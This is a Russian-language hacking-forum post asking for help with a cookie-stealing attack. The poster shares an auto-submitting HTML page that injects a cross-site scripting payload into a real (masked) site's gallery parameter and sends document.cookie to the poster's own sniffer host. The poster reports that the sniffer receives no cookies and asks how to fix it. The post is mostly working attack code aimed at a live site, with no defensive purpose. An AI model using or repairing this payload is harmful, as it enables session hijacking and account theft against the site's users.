24.08.2008, 02:08
|
|
Новичок
Регистрация: 21.08.2008
Сообщений: 9
С нами:
9326661
Репутация:
0
|
|
Вот кстати возникли проблеммы с данной процедурой получения кукисов.
нашел следующее xss на сайте.
в фотогалерее есть поле "текущая страница" (т.е. меняя значение в данном поле можно перемещаться по следующим страницам). при попытке поменять get параметры в адресной строке нарвался на фильтр
составил html код следующего вида
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();"> <h3>сейчас вы будете перенаправлены</h3>
<form action="http://хххх.ru/index.php?page=log" method="post" name="REPLIER" ">
<input type='hidden' name='page' value=' "><script language="JavaScript">aa1 = new Image(); aa1.src="http://мой_сниффер/img.php?2222"+document.cookie;</script>'>
</form>
</body>
</html>
сниферить то сниферит но вот только без куков
т.е. в снифере остаеться ip и строка "2222"
пожалуйста подскажите почему в снифере не записываются куки и в чем моя ошибка? |
|
|